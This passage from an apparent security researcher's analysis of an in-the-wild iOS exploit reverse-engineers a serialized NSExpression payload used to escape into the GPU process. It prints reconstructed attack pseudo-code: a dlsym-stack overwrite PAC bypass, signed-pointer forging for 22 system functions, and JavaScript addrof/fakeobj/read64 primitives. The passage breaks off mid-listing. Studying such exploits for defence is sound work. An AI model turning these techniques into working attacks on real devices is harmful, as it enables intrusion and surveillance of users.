  NSType type;

  if (!decoder.decode(type))

    return std::nullopt;

In this case, rather than knowing the type to decode upfront they decode a type dword from the message and choose a deserializer not based on what type they expect, but what type the message claims to contain:

switch (type) {

  case NSType::Array:

    return decodeArrayInternal(decoder, allowedClasses);

  case NSType::Color:

    return decodeColorInternal(decoder);

  case NSType::Dictionary:

    return decodeDictionaryInternal(decoder, allowedClasses);

  case NSType::Font:

    return decodeFontInternal(decoder);

  case NSType::Number:

    return decodeNumberInternal(decoder);

  case NSType::SecureCoding:

    return decodeSecureCodingInternal(decoder, allowedClasses);

  case NSType::String:

    return decodeStringInternal(decoder);

  case NSType::Date:

    return decodeDateInternal(decoder);

  case NSType::Data:

    return decodeDataInternal(decoder);

  case NSType::URL:

    return decodeURLInternal(decoder);

  case NSType::CF:

    return decodeCFInternal(decoder);

  case NSType::Unknown:

    break;

}


In this case they choose type 7, which corresponds to NSType::SecureCoding, decoded by calling decodeSecureCodingInternal, which allocates an NSKeyedUnarchiver initialized with data from the IPC message:

auto unarchiver =

  adoptNS([[NSKeyedUnarchiver alloc]

           initForReadingFromData:

             bridge_cast(data.get()) error:nullptr]);

The code adds a few more classes to the allow-list to be decoded:

auto allowedClassSet =

  adoptNS([[NSMutableSet alloc] initWithArray:allowedClasses]);

[allowedClassSet addObject:WKSecureCodingURLWrapper.class];

[allowedClassSet addObject:WKSecureCodingCGColorWrapper.class];

if ([allowedClasses containsObject:NSAttributedString.class]) {

  [allowedClassSet

    unionSet:NSAttributedString.allowedSecureCodingClasses];

}

then unarchives the object:

id result =

  [unarchiver decodeObjectOfClasses:

                allowedClassSet.get()

              forKey:

                NSKeyedArchiveRootObjectKey];

The serialized root object sent by the attackers is a WKSecureCodingURLWrapper. Deserialization of this is allowed because it was explicitly added to the allow-list above. Here's the WKSecureCodingURLWrapper::initWithCoder implementation:

- (instancetype)initWithCoder:(NSCoder *)coder

{

  auto selfPtr = adoptNS([super initWithString:@""]);

  if (!selfPtr)

    return nil;

  BOOL hasBaseURL;

  [coder decodeValueOfObjCType:"c"

         at:&hasBaseURL

         size:sizeof(hasBaseURL)];

  RetainPtr<NSURL> baseURL;

  if (hasBaseURL)

    baseURL =

     (NSURL *)[coder decodeObjectOfClass:NSURL.class

                     forKey:baseURLKey];

...

}

This in turn decodes an NSURL, which decodes an NSString member named "NS.relative". The attackers supply a subclass of NSString, _NSLocalizedString, which sets up the following allow-list:

  v10 = objc_opt_class_385(&OBJC_CLASS___NSDictionary);

  v11 = objc_opt_class_385(&OBJC_CLASS___NSArray);

  v12 = objc_opt_class_385(&OBJC_CLASS___NSNumber);

  v13 = objc_opt_class_385(&OBJC_CLASS___NSString);

  v14 = objc_opt_class_385(&OBJC_CLASS___NSDate);

  v15 = objc_opt_class_385(&OBJC_CLASS___NSData);

  v17 = objc_msgSend_setWithObjects__0(&OBJC_CLASS___NSSet, v16, v10, v11, v12, v13, v14, v15, 0LL);

  v20 = objc_msgSend_decodeObjectOfClasses_forKey__0(a3, v18, v17, CFSTR("NS.configDict"));

They then deserialize an NSSharedKeyDictionary (which is a subclass of NSDictionary):

-[NSSharedKeyDictionary initWithCoder:]

...

v6 = objc_opt_class_388(&OBJC_CLASS___NSSharedKeySet);

...

 v11 = (__int64)objc_msgSend_decodeObjectOfClass_forKey__4(a3, v8, v6, CFSTR("NS.skkeyset"));

NSSharedKeyDictionary then adds NSSharedKeySet to the allow-list and decodes one.

But recall that using the arbitrary write they've swapped the implementation class used by NSSharedKeySet to instead be PrototypeTools::_OBJC_CLASS___PTModule! Which means that initWithCoder is now actually going to be called on a PTModule. And because they also flipped all the relevant security mitigation bits, unarchiving a PTModule will have the same side effect as it did in ForcedEntry of evaluating an NSFunctionExpression. Except rather than a few kilobytes of serialized NSFunctionExpression, this time it's half a megabyte. Things are only getting started!


Part II - Data Is All You Need

NSKeyedArchiver objects are serialized as bplist objects. Extracting the bplist out of the exploit binary we can see that it's 437KB! The first thing to do is just run strings to get an idea of what might be going on. There are lots of strings we'd expect to see in a serialized NSFunctionExpression:

NSPredicateOperator_

NSRightExpression_

NSLeftExpression

NSComparisonPredicate[NSPredicate

^NSSelectorNameYNSOperand[NSArguments

NSFunctionExpression\NSExpression

NSConstantValue

NSConstantValueExpressionTself

\NSCollection

NSAggregateExpression

There are some indications that they might be doing some much more complicated stuff like executing arbitrary syscalls:

syscallInvocation

manipulating locks:

os_unfair_unlock_0x34

%os_unfair_lock_0x34InvocationInstance

spinning up threads:

.detachNewThreadWithBlock:_NSFunctionExpression

detachNewThreadWithBlock:

!NSThread_detachNewThreadWithBlock

XNSThread

3NSThread_detachNewThreadWithBlockInvocationInstance

6NSThread_detachNewThreadWithBlockInvocationInstanceIMP

pthreadinvocation

pthread____converted

yWpthread

pthread_nextinvocation

pthread_next____converted

and sending and receiving mach messages:

mach_msg_sendInvocation

mach_msg_receive____converted

 mach_make_memory_entryInvocation

mach_make_memory_entry

#mach_make_memory_entryInvocationIMP

as well as interacting with IOKit:

IOServiceMatchingInvocation

IOServiceMatching

IOServiceMatchingInvocationIMP

In addition to these strings there are also three fairly large chunks of javascript source which look fairly suspicious:

var change_scribble=[.1,.1];change_scribble[0]=.2;change_scribble[1]=.3;var scribble_element=[.1];

...

Starting up

Last time I analysed one of these I used plutil to dump out a human-readable form of the bplist. The object was small enough that I was then able to reconstruct the serialized object by hand. This wasn't going to work this time:

$ plutil -p bplist_raw | wc -l

   58995

Here's a random snippet a few tens of thousands of lines in:

14319 => {

  "$class" =>

    <CFKeyedArchiverUID 0x600001b32f60 [0x7ff85d4017d0]>

      {value = 29}

  "NSConstantValue" =>

    <CFKeyedArchiverUID 0x600001b32f40 [0x7ff85d4017d0]>

      {value = 14320}

}

14320 => 2

14321 => {

  "$class" =>

    <CFKeyedArchiverUID 0x600001b32fe0 [0x7ff85d4017d0]>

      {value = 27}

  "NSArguments" =>

    <CFKeyedArchiverUID 0x600001b32fc0 [0x7ff85d4017d0]>

      {value = 14323}

  "NSOperand" =>

    <CFKeyedArchiverUID 0x600001b32fa0 [0x7ff85d4017d0]>

      {value = 14319}

  "NSSelectorName" =>

    <CFKeyedArchiverUID 0x600001b32f80 [0x7ff85d4017d0]>

      {value = 14322}

There are a few possible analysis approaches here. I could just deserialize the object using NSKeyedUnarchiver and see what happens (potentially using dtrace to hook interesting places), but I didn't want to just learn what this serialized object does - I wanted to know how it works.

Another option would be parsing the output of plutil, but I figured this was likely almost as much work as parsing the bplist from scratch, so I decided to just write my own bplist and NSArchiver parser and go from there.

This might seem like overdoing it, but with such a huge object it was likely I would need to manipulate the object quite a lot to figure out how it actually worked.

bplist

Fortunately, bplist isn't a very complicated serialization format and only takes a hundred or so lines of code to implement. Furthermore, I didn't need to support all the bplist features, just those used in the single serialized object I was investigating.

This blog post gives a great overview of the format and also links to the CoreFoundation .c file containing a comment defining the format.

A bplist serialized object has 4 sections:

  • header
  • objects
  • offsets
  • trailer

The objects section contains all the serialized objects one after the other. The offsets table contains indexes into the objects section for each object. Compound objects (arrays, sets and dictionaries) can then reference other objects via indexes into the offsets table.

bplist only supports a small number of built-in types:

null, bool, int, real, date, data, ascii string, unicode string, uid, array, set and dictionary

The serialized form of each type is pretty straightforward, and explained clearly in this comment in CFBinaryPlist.c:

Object Formats (marker byte followed by additional info in some cases)

null   0000 0000

bool   0000 1000           // false

bool   0000 1001           // true

fill   0000 1111           // fill byte

int    0001 nnnn ...       // # of bytes is 2^nnnn, big-endian bytes

real   0010 nnnn ...       // # of bytes is 2^nnnn, big-endian bytes

date   0011 0011 ...       // 8 byte float follows, big-endian bytes

data   0100 nnnn [int] ... // nnnn is number of bytes unless 1111 then int count follows, followed by bytes

string 0101 nnnn [int] ... // ASCII string, nnnn is # of chars, else 1111 then int count, then bytes

string 0110 nnnn [int] ... // Unicode string, nnnn is # of chars, else 1111 then int count, then big-endian 2-byte uint16_t

       0111 xxxx           // unused

uid    1000 nnnn ...       // nnnn+1 is # of bytes

       1001 xxxx           // unused

array  1010 nnnn [int] objref*         // nnnn is count, unless '1111', then int count follows

       1011 xxxx                       // unused

set    1100 nnnn [int] objref*         // nnnn is count, unless '1111', then int count follows

dict   1101 nnnn [int] keyref* objref* // nnnn is count, unless '1111', then int count follows

       1110 xxxx // unused

       1111 xxxx // unused

It's a Type-Length-Value encoding with the type field in the upper nibble of the first byte. There's some subtlety to decoding the variable sizes correctly, but it's all explained fairly well in the CF code. The keyref* and objref* are indexes into the eventual array of deserialized objects; the bplist trailer defines the size of these references (so a small object with up to 256 objects could use a single byte as a reference.)
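Concretely, here's a minimal sketch in Python (the same language as the custom parser code shown later) of pulling apart the trailer and a marker byte. It assumes the layout from the CFBinaryPlist comment above; the helper names are my own:

import struct

def parse_trailer(buf):

  # the fixed 32-byte trailer at the end of the file describes everything

  # else: 6 ignored bytes, the width of offset table entries, the width of

  # the keyref/objref references used by compound objects, the object

  # count, the index of the top object and the offset of the offset table

  (offset_size, objref_size, num_objects,

   top_object, table_off) = struct.unpack(">6xBBQQQ", buf[-32:])

  offsets = [int.from_bytes(buf[table_off + i * offset_size:

                                table_off + (i + 1) * offset_size], "big")

             for i in range(num_objects)]

  return offsets, top_object, objref_size

def parse_marker(buf, off):

  # type in the upper nibble; length (or the 0b1111 "an int count

  # follows" escape) in the lower nibble

  return buf[off] >> 4, buf[off] & 0xf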

Parsing the bplist and printing it ends up with an object with this format:

dict {

  ascii("$top"):

    dict {

      ascii("root"):

        uid(0x1)

    }

  ascii("$version"):

    int(0x186a0)

  ascii("$objects"):

    array [

      [+0]:

        ascii("$null")

      [+1]:

        dict {

          ascii("NS.relative"):

            uid(0x3)

          ascii("WK.baseURL"):

            uid(0x3)

          ascii("$0"):

            int(0xe)

          ascii("$class"):

            uid(0x2)

        }

      [+2]:

        dict {

          ascii("$classes"):

            array [

              [+0]:

                ascii("WKSecureCodingURLWrapper")

              [+1]:

                ascii("NSURL")

              [+2]:

                ascii("NSObject")

            ]

          ascii("$classname"):

            ascii("WKSecureCodingURLWrapper")

        }

...

The top level object in this bplist is a dictionary with three entries:

$version: int(100000)

$top: uid(1)

$objects: an array of dictionaries

This is the top-level format for an NSKeyedArchiver. Indirection in NSKeyedArchivers is done using the uid type, where the values are integer indexes into the $objects array. (Note that this is an extra layer of indirection, on top of the keyref/objref indirection used at the bplist layer.)

The $top dictionary has a single key "root" with value uid(1) indicating that the object serialized by the NSKeyedArchiver is encoded as the second entry in the $objects array.

Each object encoded within the NSKeyedArchiver effectively consists of two dictionaries: one defining its properties and one defining its class. Tidying up the sample above (since dictionary keys are all ascii strings) the properties dictionary for the first object looks like this:

{

  NS.relative : uid(0x3)

  WK.baseURL :  uid(0x3)

  $0 :          int(0xe)

  $class :      uid(0x2)

}

The $class key tells us the type of object which is serialized. Its value is uid(2) which means we need to go back to the objects array and find the dictionary at that index:

{

  $classname : "WKSecureCodingURLWrapper"

  $classes   : ["WKSecureCodingURLWrapper",

                "NSURL",

                "NSObject"]

}

Note that in addition to telling us the final class (WKSecureCodingURLWrapper) it also defines the inheritance hierarchy. The entire serialized object consists of a fairly enormous graph of these two types of dictionaries defining properties and types.

It shouldn't be a surprise to see WKSecureCodingURLWrapper here; we saw it right at the end of the first section.

Finding the beginning

Since we have a custom parser we can start dumping out subsections of the object graph looking for the NSExpressions. In the end we can follow these properties to find an array of PTSection objects, each of which contains multiple PTRow objects, each with an associated condition in the form of an NSComparisonPredicate:

sections = follow(root_obj, ['NS.relative', 'NS.relative', 'NS.configDict', 'NS.skkeyset', 'components', 'NS.objects'])
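follow is a small helper from the custom parser. A minimal sketch of the idea, assuming the archiver objects have been parsed into plain dicts and that uid values are indexes into the top-level $objects array:

def follow(obj, path, objects):

  # walk a list of property names through the object graph, resolving

  # each uid through the $objects array as described earlier

  for key in path:

    obj = objects[obj[key].value]

  return obj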

Each of those PTRows contains a single predicate to evaluate - in the end the relevant parts of the payload are contained entirely in four NSExpressions.

Types

There are only a handful of primitive NSExpression family objects from which the graph is built:

NSComparisonPredicate

  NSLeftExpression

  NSRightExpression

  NSPredicateOperator

Evaluate the left and right side then return the result of comparing them with the given operator.

NSFunctionExpression

  NSSelectorName

  NSArguments

  NSOperand

Send the provided selector to the operand object passing the provided arguments, returning the return value

NSConstantValueExpression

  NSConstantValueClassName

  NSConstantValue

A constant value or Class object

NSVariableAssignmentExpression

  NSAssignmentVariable

  NSSubexpression

Evaluate the NSSubexpression and assign its value to the named variable

NSVariableExpression

  NSVariable

Return the value of the named variable

NSCustomPredicateOperator

  NSSelectorName

The name of a selector to invoke as a comparison operator

NSTernaryExpression

  NSPredicate

  NSTrueExpression

  NSFalseExpression

Evaluate the predicate then evaluate either the true or false branch depending on the value of the predicate.

E2BIG

The problem is that the object graph is simply enormous, with very deep nesting. Attempts to perform simple transforms of the graph to a text representation quickly produced incomprehensible results, with over 40 layers of nesting.

It's very unlikely that whoever crafted this serialized object actually wrote the entire payload as a single expression. Much more likely is that they used some tricks and tooling to turn a sequential series of operations into a single statement. But to figure those out we still need a better way to see what's going on.

Going DOTty

This object is a graph - so rather than trying to immediately transform it to text why not try to visualize it as a graph instead?

DOT is the graph description language used by graphviz - an open-source graph drawing package. It's pretty simple:

digraph {

 A -> B

 B -> C

 C -> A

}

Diagram showing a three-node DOT graph with a cycle from A to B to C to A.

You can also define nodes and edges separately and apply properties to them:

digraph {

A [shape=square]

B [label="foo"]

 A -> B

 B -> C

 C -> A [style=dotted]

}

A simple 3 node diagram showing different DOT node and edge styles

With the custom parser it's relatively easy to emit a dot representation of the entire NSExpression graph. But when it comes time to actually render it, progress is rather slow...
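Emitting the DOT itself is just a walk over the parsed objects - something like this sketch, where Uid and classname_of are hypothetical names standing in for my parser's types:

def emit_dot(objects, out):

  out.write("digraph {\n")

  for idx, obj in enumerate(objects):

    if not isinstance(obj, dict):

      continue

    # one node per archived object, labelled with its class name

    out.write('n%d [label="%s"]\n' % (idx, classname_of(obj, objects)))

    # one edge per uid-valued property

    for key, value in obj.items():

      if isinstance(value, Uid):

        out.write('n%d -> n%d [label="%s"]\n' % (idx, value.value, key))

  out.write("}\n")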

After leaving it overnight without success it seemed that yet another approach was required. Graphviz is certainly capable of rendering a graph with tens of thousands of nodes; the part which was likely failing was graphviz's attempt to lay out the nodes in a clean way.

Medium data

Maybe some of the tools explicitly designed for interactively exploring large datasets could help here. I chose to use Gephi, an open-source graph visualization platform.

I loaded the .dot file into Gephi and waited for the magic:

A screenshot of Gephi showing a graph with thousands of overlapping nodes rendered into an almost solid square of indistinguishable circles and arrows

This might take some more work.

Directing forces

The default layout seems to just position all the nodes equally in a square - not particularly useful. But using the layout menu on the left we can choose layouts which might give us some insight. Here's a force-directed layout, which emphasizes highly-connected nodes:

Screenshot of Gephi showing a large complex graph where the nodes are distinguishable and there is some clustering

Much better! I then started to investigate which nodes have large in- or out-degrees and to figure out why. For example here we can see that a node with the label func:alloc has a huge in-degree.

Screenshot of Gephi showing the func:alloc node with a very large number of incoming graph edges

Trying to lay out the graph with nodes with such high in-degrees just leads to a mess (and was potentially what was slowing the graphviz tools down so much), so I started adding hacks to the custom parser to duplicate certain nodes, while maintaining the semantics of the expression, in order to minimize the number of crossing edges in the graph.

During this iterative process I ended up creating the graph shown at the start of this writeup, when only a handful of high in-degree nodes remained and the rest separated cleanly into clusters:

A graph rendering of the sandbox escape NSExpression payload node graph, with an eerie similarity to a human eye

Flattening

Although this created a large number of extra nodes in the graph, it turned out to make things much easier for graphviz to lay out. It still can't do the whole graph, but we can now split it into chunks which successfully render to very large SVGs. The advantage of switching back to graphviz is that we can render arbitrary information with custom node and edge labels. For example, using custom shape primitives to make the arrays of NSFunctionExpression arguments stand out more clearly:

Diagram showing an NSExpression subgraph performing a bitwise operation and using variables

Here we can see nested, related function calls, where the intention is clearly to pass the return value from one call as the argument to another. Starting in the bottom right of the graph shown above we can work backwards (towards the top left) to reconstruct pseudo-Objective-C:

[writeInvocationName

  getArgument:

    [ [_NSPredicateUtils

        bitwiseOr: [NSNumber numberWithUnsignedLongLong:

                              [intermediateAddress: bytes]]

        with: @0x8000000000000000]] longLongValue ]

  atIndex: [@0x1 longLongValue] ]

We can also now clearly see the trick they use to execute multiple unrelated statements:

Diagram showing a graph of NSNull alloc nodes tying unrelated statements together

Multiple unrelated expressions are evaluated sequentially by passing them as arguments to an NSFunctionExpression calling [NSNull alloc]. This is a method which takes no arguments and has no side-effects (the NSNull is a singleton and alloc returns a global pointer) but the NSFunctionExpression evaluation will still evaluate all the provided arguments then discard them.

They build a huge tree of these [NSNull alloc] nodes which allows them to sequentially execute unrelated expressions.

Diagram showing nodes and edges in a tree of NSNull alloc NSFunctionExpressions

Connecting the dots

Since the return values of the evaluated arguments are discarded they use NSVariableExpressions to connect the statements semantically. These are a wrapper around an NSDictionary object which can be used to store named values. Using the custom parser we can see there are 218 different named variables. Interestingly, whilst the Mach-O is stripped and all symbols were removed, that's not the case for the NSVariables - we can see their full (presumably original) names.

bplist_to_objc

Having figured out the NSNull trick they use for sequential expression evaluation, it's now possible to flatten the graph to pseudo-Objective-C code, splitting each argument to an [NSNull alloc] NSFunctionExpression into separate statements:

id v_detachNewThreadWithBlock:_NSFunctionExpression = [NSNumber numberWithUnsignedLongLong:[[[NSFunctionExpression alloc] initWithTarget:@"target" selectorName:@"detachNewThreadWithBlock:" arguments:@[] ] selector] ];

This is getting closer to a decompiler-type output. It's still a bit jumbled, but significantly more readable than the graph and can be refactored in a code editor.
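The flattening step itself is simple once you know the trick. A minimal sketch, reusing the follow helper from earlier with is_nsnull_alloc as a hypothetical predicate:

def flatten(expr, objects, statements):

  # an [NSNull alloc] NSFunctionExpression exists only to sequence its

  # arguments, so recurse into each argument as a standalone statement

  if is_nsnull_alloc(expr, objects):

    for arg in follow(expr, ['NSArguments', 'NS.objects'], objects):

      flatten(arg, objects, statements)

  else:

    statements.append(expr)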

Helping out

The expressions make use of NSPredicateUtilities for arithmetic and bitwise operations. Since we don't have to support arbitrary input, we can just hardcode the selectors which implement those operations and emit a more readable helper function call instead:

      if selector_str == 'bitwiseOr:with:':

        arg_vals = follow(o, ['NSArguments', 'NS.objects'])

        s += 'set_msb(%s)' % parse_expression(arg_vals[0], depth+1)

      elif selector_str == 'add:to:':

        arg_vals = follow(o, ['NSArguments', 'NS.objects'])

        s += 'add(%s, %s)' % (parse_expression(arg_vals[0], depth+1), parse_expression(arg_vals[1], depth+1))

This yields arithmetic statements which look like this:

[v_dlsym_lock_ptrinvocation setArgument:[set_msb(add(v_OOO_dyld_dyld, @0xa0)) longLongValue] atIndex:[@0x2 longLongValue] ];

but...why?

After all that we're left with around 1000 lines of sort-of readable pseudo-Objective-C. There are a number of further tricks they use to implement things like arbitrary read and write, which I manually replaced with simple assignment statements.

The attackers are already in a very strong position at this point; they can evaluate arbitrary NSExpressions, with the security bits disabled such that they can still allocate and interact with arbitrary classes. But in this case the attackers are determined to be able to call arbitrary functions, without being restricted to just Objective-C selector invocations.

The major barrier to doing this easily is PAC (pointer authentication.) The B-family PAC keys used for backwards-edge protection (e.g. return addresses on the stack) were always per-process but the A-family keys (used for forward-edge protection for things like function pointers) used to be shared across all userspace processes, meaning userspace tasks could forge signed forward-edge PAC'ed pointers which would be valid in other tasks.

With some low-level changes to the virtual memory code it's now possible for tasks to use private, isolated A-family keys as well, which means that the WebContent process can't necessarily forge forward-edge PAC'ed pointers for other tasks (like the GPU Process.)

Most previous userspace PAC defeats were finding a way where a forged forward-edge function pointer could be used across a privilege boundary - and when forward-edge keys were shared there were a great number of such primitives. Kernel PAC defeats tended to be slightly more involved, often targeting race-conditions to create signing oracles or similar primitives. We'll see that the attackers took inspiration from those kernel-PAC defeats here...

Invoking Invocations with IMPs

An NSInvocation, as the name suggests, wraps up an Objective-C method call such that it can be called at a later point. Although conceptually in Objective-C you don't "call methods" but instead "pass messages to objects", in reality you do of course eventually end up at a branch instruction to the native code which implements the selector for the target object. It's also possible to cache the address of this native code as an IMP object (it's really just a function pointer.)

As outlined in the see-no-eval NSExpression blogpost, NSInvocations can be used to get instruction pointer control from NSExpressions - with the caveat that you must provide a signed PC value. The first method they call using this primitive is the implementation of [CFPrefsSource lock]:

; void __cdecl -[CFPrefsSource lock](CFPrefsSource *self, SEL)

ADD  X0, X0, #0x34

B    _os_unfair_lock_lock

They get a signed (with PACIZA) IMP for this function by calling

id os_unfair_lock_0x34_IMP = [[CFPrefsSource alloc] methodForSelector: sel(lock)]

To call that function they use two nested NSInvocations:

id invocationInner = [templateInvocation copy];

[invocationInner setTarget:(dlsym_lock_ptr - 0x34)]

[invocationInner setSelector: [@0x43434343 longLongValue]]

id invocationOuter = [templateInvocation copy];

[invocationOuter setSelector: sel(invokeUsingIMP)];

[invocationOuter setArgument: os_unfair_lock_0x34_IMP

                   atIndex: @2];

They then call invoke on the outer invocation, which invokes the inner invocation via invokeUsingIMP:, allowing the [CFPrefsSource lock] function implementation to be called on something which most certainly isn't a CFPrefsSource object (as invokeUsingIMP: bypasses the regular Objective-C selector-to-IMP lookup process.)

Lock what?

But what is that lock, and why are they locking it? That lock is used here inside dlsym:

// dlsym() assumes symbolName passed in is same as in C source code

// dyld assumes all symbol names have an underscore prefix

BLOCK_ACCCESSIBLE_ARRAY(char, underscoredName, strlen(symbolName) + 2);

underscoredName[0] = '_';

strcpy(&underscoredName[1], symbolName);

__block Diagnostics diag;

__block Loader::ResolvedSymbol result;

if ( handle == RTLD_DEFAULT ) {

  // magic "search all in load order" handle

  __block bool found = false;

  withLoadersReadLock(^{

    for ( const dyld4::Loader* image : loaded ) {

      if ( !image->hiddenFromFlat() && image->hasExportedSymbol(diag, *this, underscoredName, Loader::shallow, &result) ) {

        found = true;

        break;

      }

    }

  });

withLoadersReadLock first takes the global lock (the one which the NSInvocation just locked) before evaluating the block which resolves the symbol:

this->libSystemHelpers->os_unfair_recursive_lock_lock_with_options(

  &(_locks.loadersLock),

  OS_UNFAIR_LOCK_NONE);

work();

this->libSystemHelpers->os_unfair_recursive_lock_unlock(

  &_locks.loadersLock);

So by taking this lock the NSExpression has ensured that any calls to dlsym in the GPU process will block waiting for this lock.

Threading the needle

Next they use the same double-invocation trick to make the following Objective-C call:

[NSThread detachNewThreadWithBlock:aBlock]

passing as the block argument a pointer to a block inside the CoreGraphics library with the following body:

void *__CGImageCreateWithPNGDataProvider_block_invoke_2()

{

  void *sym;

  if ( CGLibraryLoadImageIODYLD_once != -1 ) {

    dispatch_once(&CGLibraryLoadImageIODYLD_once,

                  &__block_literal_global_5_15015);

  }

  if ( !CGLibraryLoadImageIODYLD_handle ) {

    // fail

  }

  sym = dlsym(CGLibraryLoadImageIODYLD_handle,

                 "CGImageSourceGetType");

  if ( !sym ) {

    // fail

  }

  CGImageCreateWithPNGDataProvider = sym;

  return sym;

}

Prior to starting the thread calling that block they also perform two arbitrary writes to set:

CGLibraryLoadImageIODYLD_once = -1

and

CGLibraryLoadImageIODYLD_handle = RTLD_DEFAULT

This means that the thread running that block will reach the call to:

dlsym(CGLibraryLoadImageIODYLD_handle,

                 "CGImageSourceGetType");

then block inside the implementation of dlsym waiting to take a lock held by the NSExpression.

Sleep and repeat

They call [NSThread sleepForTimeInterval] to sleep on the NSExpression thread to ensure that the victim dlsym thread has started, then read the value of libpthread::___pthread_head, the start of a linked-list of pthreads representing all the running threads (the address of which was linked and rebased by the JS.)

They then use an unrolled loop of 100 NSTernaryExpressions to walk that linked list looking for the last entry (which has a null pthread.next field) which is the most recently-started thread.

They use a hardcoded offset into the pthread struct to find the thread's stack and create an NSData object wrapping the first page of the dlsym thread's stack:

id v_stackData = [NSData dataWithBytesNoCopy:[set_msb(v_stackEnd) longLongValue] length:[@0x4000 longLongValue] freeWhenDone:[@0x0 longLongValue] ];

Recall this code we saw earlier in the dlsym snippet:

// dlsym() assumes symbolName passed in is same as in C source code

// dyld assumes all symbol names have an underscore prefix

BLOCK_ACCCESSIBLE_ARRAY(char, underscoredName, strlen(symbolName) + 2);

underscoredName[0] = '_';

strcpy(&underscoredName[1], symbolName);

BLOCK_ACCCESSIBLE_ARRAY is really creating an alloca-style local stack buffer in order to prepend an underscore to the symbol name, which explains why the NSExpression code does this next:

[v_stackData rangeOfData:@"b'_CGImageSourceGetType'" options:[@0x0 longLongValue] range:[@0x0 longLongValue] [@0x4000 longLongValue] ]

This returns an NSRange object defining where the string "_CGImageSourceGetType" appears in that page of the stack. "CGImageSourceGetType" (without the underscore) is the hardcoded (and constant, in read-only memory) string which the block passes to dlsym.

The NSExpression then calculates the absolute address of that string on the thread stack and uses [NSData getBytes:length:] to write the contents of an NSData object containing the string "_dlsym\0\0" over the start of the "_CGImageSourceGetType" string on the blocked dlsym thread.

Unlock and go

Using the same tricks as before (but this time using the IMP of [CFPrefsSource unlock]) they unlock the global lock blocking the dlsym thread. This causes the block to continue executing and dlsym to complete, now returning a PACIZA-signed function pointer to dlsym instead of CGImageSourceGetType.

The block then assigns the return value of that call to dlsym to a global variable:

  CGImageCreateWithPNGDataProvider = sym;

The NSExpression calls sleepForTimeInterval again to ensure that the block has completed, then reads that global variable to get a signed function pointer to dlsym!

(It's worth noting that it used to be the case, as documented by Samuel Groß in his iMessage remote exploit writeup, that there were Objective-C methods such as [CNFileServices dlsym:] which would directly give you the ability to call dlsym and get PACIZA-signed function pointers.)

Do look up

Armed with a signed dlsym pointer they use the nested invocation trick to call dlsym 22 times to get 22 more signed function pointers, assigning them to numbered variables:

#define f_def(v_index, sym) \\

  id v_symInvocation = [v_templateInvocation copy];

  [v_#sym#Invocation setTarget:[@0xfffffffffffffffe longLongValue] ];

  [v_#sym#Invocation setSelector:[@"sym" UTF8String] ];

  id v_#sym#InvocationIMP = [v_templateInvocation copy];

  [v_#sym#InvocationIMP setSelector:[v_invokeUsingIMP:_NSFunctionExpression longLongValue] ];

  [v_writeInvocationName setSelector:[v_dlsymPtr longLongValue] ];

  [v_writeInvocationName getArgument:[set_msb([NSNumber numberWithUnsignedLongLong:[v_intermidiateAddress bytes] ]) longLongValue] atIndex:[@0x1 longLongValue] ];

  [v_#sym#InvocationIMP setArgument:[set_msb([NSNumber numberWithUnsignedLongLong:[v_intermidiateAddress bytes] ]) longLongValue] atIndex:[@0x2 longLongValue] ];

  [v_#sym#InvocationIMP setTarget:v_symInvocation ];

  [v_#sym#InvocationIMP invoke];

  id v_#sym#____converted = [NSNumber numberWithUnsignedLongLong:[@0xaaaaaaaaaaaaaaa longLongValue] ];

  [v_#sym#Invocation getReturnValue:[set_msb(add([NSNumber numberWithUnsignedLongLong:v_#sym#____converted ], @0x10)) longLongValue] ];

  id v_#sym# = v_#sym#____converted;

  id v_#index = v_#sym;

}

f_def(0, syscall)

f_def(1, task_self_trap)

f_def(2, task_get_special_port)

f_def(3, mach_port_allocate)

f_def(4, sleep)

f_def(5, mach_absolute_time)

f_def(6, mach_msg)

f_def(7, mach_msg2_trap)

f_def(8, mach_msg_send)

f_def(9, mach_msg_receive)

f_def(10, mach_make_memory_entry)

f_def(11, mach_port_type)

f_def(12, IOMainPort)

f_def(13, IOServiceMatching)

f_def(14, IOServiceGetMatchingService)

f_def(15, IOServiceOpen)

f_def(16, IOConnectCallMethod)

f_def(17, open)

f_def(18, sprintf)

f_def(19, printf)

f_def(20, OSSpinLockLock)

f_def(21, objc_msgSend)

Another path

Still not satisfied with the ability to call arbitrary (exported, named) functions from NSExpressions the exploit now takes yet another turn and comes, in a certain sense, full circle by creating a JSContext object to evaluate javascript code embedded in a string inside the NSExpression:

id v_JSContext = [[JSContext alloc] init];

[v_JSContext evaluateScript:@"function hex(b){return(\"0\"+b.toString(16)).substr(-2)}function hexlify(bytes){var res=[];for(var i=0..." ];

...

The exploit evaluates three separate scripts inside this same context:

JS 1

The first script defines a large set of utility types and functions common to many JS engine exploits. For example it defines a Struct type:

const Struct = function() {

  var buffer = new ArrayBuffer(8);

  var byteView = new Uint8Array(buffer);

  var uint32View = new Uint32Array(buffer);

  var float64View = new Float64Array(buffer);

  return {

    pack: function(type, value) {

       var view = type;

       view[0] = value;

       return new Uint8Array(buffer, 0, type.BYTES_PER_ELEMENT)

      },

    unpack: function(type, bytes) {

        if (bytes.length !== type.BYTES_PER_ELEMENT) throw Error("Invalid bytearray");

        var view = type;

        byteView.set(bytes);

        return view[0]

    },

    int8: byteView,

    int32: uint32View,

    float64: float64View

  }

}();

The majority of the code is defining a custom fully-featured Int64 type.

At the end they define two very useful helper functions:

function addrof(obj) {

  addrof_obj_ary[0] = obj;

  var addr = Int64.fromDouble(addrof_float_ary[0]);

  addrof_obj_ary[0] = null;

  return addr

}

function fakeobj(addr) {

  addrof_float_ary[0] = addr.asDouble();

  var fake = addrof_obj_ary[0];

  addrof_obj_ary[0] = null;

  return fake

}

as well as a read64() primitive:

function read64(addr) {

  read64_float_ary[0] = addr.asDouble();

  var tmp = "";

  for (var it = 0; it < 4; it++) {

    tmp = ("000" + read64_str.charCodeAt(it).toString(16)).slice(-4) + tmp

  }

  var ret = new Int64("0x" + tmp);

  return ret

}

Of course, these primitives don't actually work - they are the standard primitives which would usually be built from a JS engine vulnerability like a JIT compiler bug, but there's no vulnerability being exploited here. Instead, after this script has been evaluated the NSExpression uses the [JSContext objectForKeyedSubscript:] method to look up the global objects used by those primitives and directly corrupts the underlying objects (like the arrays used by addrof and fakeobj) such that they work.

This sets the stage for the second of the three scripts to run:

JS 2

JS2 uses the corrupted addrof_* arrays to build a write64 primitive then declares the following dictionary:

var all_function = {

  syscall: 0n,

  mach_task_self: 1n,

  task_get_special_port: 2n,

  mach_port_allocate: 3n,

  sleep: 4n,

  mach_absolute_time: 5n,

  mach_msg: 6n,

  mach_msg2_trap: 7n,

  mach_msg_send: 8n,

  mach_msg_receive: 9n,

